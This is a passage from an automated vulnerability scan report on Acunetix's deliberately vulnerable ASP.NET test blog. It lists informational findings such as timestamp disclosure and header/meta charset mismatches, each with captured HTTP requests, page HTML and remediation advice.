          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

  7. Risk=Informational, Confidence= (4)

    1. http://testaspnet.vulnweb.com (4)

      1. Charset Mismatch (Header Versus Meta Content-Type Charset) (4)
        1. GET http://testaspnet.vulnweb.com
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and the content body, web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        2. GET http://testaspnet.vulnweb.com/
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and the content body, web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
